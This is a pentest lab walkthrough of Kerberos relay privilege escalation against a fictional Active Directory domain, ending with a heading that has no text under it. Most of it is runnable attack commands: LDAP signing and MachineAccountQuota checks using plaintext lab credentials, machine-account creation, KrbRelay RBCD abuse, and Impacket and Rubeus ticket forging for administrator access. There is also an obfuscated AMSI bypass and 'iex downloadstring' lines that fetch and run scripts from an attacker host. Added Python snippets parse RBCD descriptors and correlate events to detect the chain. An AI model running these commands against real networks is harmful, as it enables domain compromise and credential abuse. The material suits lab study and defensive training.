# KrbRelay Up - Linux

* Another very useful technique to escalate privileges is Kerberos relay, as implemented in [KrbRelayUp](https://github.com/Dec0ne/KrbRelayUp)
* As KrbRelayUp is detected by Defender, we will use the step by step approach from [this writeup](https://gist.github.com/tothi/bf6c59d6de5d0c9710f23dae5750c4b9) by @an0n\_r0, using @cube0x0's [KrbRelay](https://github.com/cube0x0/KrbRelay)
* At the time of writing KrbRelay is not detected by Defender.
* The condition for this privesc is that LDAP signing is NOT enforced on the DC; we can check that with the cme ldap-signing module:

```
crackmapexec ldap 192.168.56.10-12 -u elena.lopez -p princesa1 -d north.newyork.local -M ldap-signing
```

<figure><img src="/files/tU4kCzcqtdxoXnOuaaFn" alt=""><figcaption></figcaption></figure>

**Add computer and RBCD**

* To exploit krbrelay by adding a computer, you must be able to add new computer accounts (MachineAccountQuota > 0); we can check that with the cme MAQ module

```
crackmapexec ldap 192.168.56.11 -u elena.lopez -p princesa1 -d north.newyork.local -M MAQ
```

<figure><img src="/files/oi1fqkuBtujqX1tBhwWk" alt=""><figcaption></figcaption></figure>

### Add computer

```
addcomputer.py -computer-name 'krbrelay$' -computer-pass 'ComputerPassword' -dc-host bronx.north.newyork.local -domain-netbios NORTH 'north.newyork.local/pacofish:pacofish'
addcomputer.py -computer-name 'krbrelay$' -computer-pass 'ComputerPassword' -dc-host bronx.north.newyork.local -domain-netbios NORTH 'north.newyork.local/elena.lopez:princesa1'
```

### Get the SID of that computer

#### From windows

```
$o = ([ADSI]"LDAP://CN=krbrelay,CN=Computers,DC=north,DC=newyork,DC=local").objectSID
(New-Object System.Security.Principal.SecurityIdentifier($o.value, 0)).Value
S-1-5-21-3634065772-4036021599-3644360361-1136
```

#### From Linux

```
lookupsid.py -domain-sids north.newyork.local/elena.lopez:princesa1@192.168.56.10 0
```

```
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.56.31:8000/PowerView.ps1', 'C:\Users\Elena.Lopez\Documents\PowerView.ps1')
```

### Check ports

#### xrdp

```
xfreerdp /u:pacofish /p:pacofish /v:192.168.56.11 /cert-ignore
```

```
PS C:\Users\pacofish\Desktop> .\CheckPort.exe
[*] Looking for available ports..
[*] SYSTEM Is allowed through port 443
```

### Launch krbrelay

CLSID: `CIeAxiInstallerService Class`, see the [xcyclopedia entry for 90F18417-F0F1-484E-9D3C-59DCEEE5DBD8](https://strontic.github.io/xcyclopedia/library/clsid_90F18417-F0F1-484E-9D3C-59DCEEE5DBD8.html)

```
PS C:\Users\elena.lopez\Desktop> .\KrbRelay.exe -spn ldap/bronx.north.newyork.local -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -rbcd S-1-5-21-3634065772-4036021599-3644360361-1136 -port 443
```

<figure><img src="/files/bGeGQInPsLZCvmYuymHb" alt=""><figcaption></figcaption></figure>
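The `-rbcd` step above writes a security descriptor into the host's `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute. As an added example (not part of the write-up or of KrbRelay), here is a parser for that self-relative descriptor that lists the SIDs trusted for delegation, which is what a defender wants when auditing servers for unexpected RBCD entries; `build_rbcd_sd` and `SAMPLE_SD` are constructed test data that mimic the attribute's shape, using the computer SID from this page.

```python
import struct

def sid_to_str(b: bytes) -> str:
    """Binary SID (e.g. an objectSID attribute value) to its S-1-... text form."""
    rev, count = b[0], b[1]
    authority = int.from_bytes(b[2:8], "big")
    subs = struct.unpack_from("<%dI" % count, b, 8)
    return "S-%d-%d" % (rev, authority) + "".join("-%d" % s for s in subs)

def str_to_sid(s: str) -> bytes:
    parts = [int(x) for x in s.split("-")[1:]]          # drop the leading "S"
    rev, authority, subs = parts[0], parts[1], parts[2:]
    return bytes([rev, len(subs)]) + authority.to_bytes(6, "big") + struct.pack("<%dI" % len(subs), *subs)

def rbcd_trusted_sids(sd: bytes) -> list:
    """SIDs granted by ACCESS_ALLOWED ACEs in a self-relative security descriptor,
    i.e. the accounts allowed to delegate to the host that carries this attribute."""
    rev, _, control, _, _, _, off_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if rev != 1 or not control & 0x0004 or off_dacl == 0:   # SE_DACL_PRESENT must be set
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, off_dacl)   # ACL header
    pos, sids = off_dacl + 8, []
    for _ in range(ace_count):
        ace_type, _, ace_size = struct.unpack_from("<BBH", sd, pos)
        if ace_type == 0x00:                        # ACCESS_ALLOWED_ACE_TYPE
            sid_len = 8 + 4 * sd[pos + 9]           # 8 fixed bytes + 4 per sub-authority
            sids.append(sid_to_str(sd[pos + 8:pos + 8 + sid_len]))
        pos += ace_size                             # skip ACE types we do not interpret
    return sids

def build_rbcd_sd(sid_strs) -> bytes:
    """Constructed test helper: a descriptor of the shape the RBCD attribute holds
    (SE_SELF_RELATIVE | SE_DACL_PRESENT, one full-control allow ACE per SID)."""
    aces = b"".join(struct.pack("<BBHI", 0x00, 0, 8 + len(str_to_sid(s)), 0x000F01FF) + str_to_sid(s)
                    for s in sid_strs)
    acl = struct.pack("<BBHHH", 4, 0, 8 + len(aces), len(sid_strs), 0) + aces
    return struct.pack("<BBHIIII", 1, 0, 0x8004, 0, 0, 0, 20) + acl    # DACL right after the 20-byte header

# Constructed sample: the computer SID from this write-up, as the -rbcd step would store it
SAMPLE_SD = build_rbcd_sd(["S-1-5-21-3634065772-4036021599-3644360361-1136"])

if __name__ == "__main__":
    print(rbcd_trusted_sids(SAMPLE_SD))
```

On a real server, feed `rbcd_trusted_sids` the raw attribute bytes read over LDAP and compare the result against the delegations you actually intended.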

### Now we finish with RBCD exploitation

#### From Linux with Impacket

```
getTGT.py -dc-ip 'bronx.north.newyork.local' 'north.newyork.local'/'krbrelay$':'ComputerPassword'
export KRB5CCNAME=/workspace/krbrelay\$.ccache
getST.py -impersonate 'administrator' -spn 'CIFS/yonkers.north.newyork.local' -k -no-pass -dc-ip 'bronx.north.newyork.local' 'north.newyork.local'/'krbrelay$'
export KRB5CCNAME=/workspace/administrator@CIFS_yonkers.north.newyork.local@NORTH.NEWYORK.LOCAL.ccache
wmiexec.py -k @yonkers.north.newyork.local

C:\>whoami
north\administrator
```

<figure><img src="/files/kONCWmnrE6nty4QJGQP1" alt=""><figcaption></figcaption></figure>

#### with Rubeus from Windows

```
$x=[Ref].Assembly.GetType('System.Management.Automation.Am'+'siUt'+'ils');$y=$x.GetField('am'+'siCon'+'text',[Reflection.BindingFlags]'NonPublic,Static');$z=$y.GetValue($null);[Runtime.InteropServices.Marshal]::WriteInt32($z,0x41424344)
iex(new-object system.net.webclient).downloadstring('http://192.168.56.31:8080/amsi_rmouse.txt')
iex(new-object net.webclient).downloadstring('http://192.168.56.31:8080/PowerSharpPack/PowerSharpPack.ps1')
PowerSharpPack -rubeus -Command "hash /password:ComputerPassword"
PowerSharpPack -rubeus -Command "s4u /user:krbrelay$ /rc4:0EDDEDC35EB7B7ECDE0C9F0564E54C83 /impersonateuser:administrator /msdsspn:host/yonkers/ptt"
```

* And just like the writeup made by @an0n\_r0 we launch [SCMUACBypass.exe](https://gist.github.com/tyranid/c24cfd1bd141d14d4925043ee7e03c82) by Tyranid and get a system shell

<figure><img src="https://mayfly277.github.io/assets/blog/GOAD/privesc_withrubeus.png" alt=""><figcaption></figcaption></figure>

Without AV, or if you modify/obfuscate KrbRelayUp, you can do all of this with the following commands:

```
.\KrbRelayUp.exe relay -Domain north.newyork.local -CreateNewComputerAccount -ComputerName evilhost2$ -ComputerPassword pass@123
./KrbRelayUp.exe spawn -m rbcd -d north.newyork.local -dc bronx.north.newyork.local -cn evilhost2$ -cp pass@123
```

* KrbRelay can also be used to relay to ADCS or to add msDS-KeyCredentialLink and exploit it with Shadow Credentials. All you need to know is on [this page](https://github.com/Dec0ne/KrbRelayUp); this is left as an exercise to the reader.
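A defender-side counterpart, added here and not part of the write-up: correlation logic over constructed Security-log events that flags the footprint of the chain above, a computer account created by an ordinary user followed by a write to `msDS-AllowedToActOnBehalfOfOtherIdentity` by the relayed host's own machine account. The event IDs (4741 computer account created, 5136 directory object modified) are real; the field names and sample values are my own simplification.

```python
from datetime import datetime, timedelta

RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"

# Constructed sample events, a minimal subset of Windows Security log fields.
# 4741 = computer account created; 5136 = directory object modified (5136 only
# appears when the computer object's SACL audits attribute writes).
SAMPLE_EVENTS = [
    {"time": "2023-05-01T10:00:00", "id": 4741, "subject": "NORTH\\elena.lopez",
     "target": "krbrelay$"},
    {"time": "2023-05-01T10:04:30", "id": 5136, "subject": "NORTH\\YONKERS$",
     "target": "CN=YONKERS,CN=Computers,DC=north,DC=newyork,DC=local", "attr": RBCD_ATTR},
    {"time": "2023-05-01T12:00:00", "id": 4741, "subject": "NORTH\\Administrator",
     "target": "srv01$"},
]

def _when(e):
    return datetime.fromisoformat(e["time"])

def _account_name(subject):
    return subject.split("\\")[-1].rstrip("$").upper()

def self_rbcd_writes(events):
    """5136 events where a machine account edits its own RBCD attribute: with
    KrbRelay the relayed LDAP session is the host's own computer account."""
    return [e for e in events
            if e["id"] == 5136 and e.get("attr") == RBCD_ATTR
            and e["target"].upper().startswith("CN=%s," % _account_name(e["subject"]))]

def find_rbcd_chains(events, window_minutes=30, allowlist=frozenset()):
    """Pair each RBCD write with computer creations shortly before it by a
    subject not on the allowlist (the add-computer + relay footprint)."""
    writes = [e for e in events if e["id"] == 5136 and e.get("attr") == RBCD_ATTR]
    creations = [e for e in events if e["id"] == 4741 and e["subject"] not in allowlist]
    window = timedelta(minutes=window_minutes)
    chains = []
    for w in writes:
        for c in creations:
            if timedelta(0) <= _when(w) - _when(c) <= window:
                chains.append({"created_by": c["subject"], "new_account": c["target"],
                               "rbcd_target": w["target"], "written_by": w["subject"]})
    return chains

if __name__ == "__main__":
    for hit in find_rbcd_chains(SAMPLE_EVENTS):
        print("possible KrbRelay RBCD chain:", hit)
```

Enforcing LDAP signing and channel binding and setting MachineAccountQuota to 0 removes the preconditions this page relies on; the correlation above is the fallback for environments where that has not happened yet.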

**With other methods**
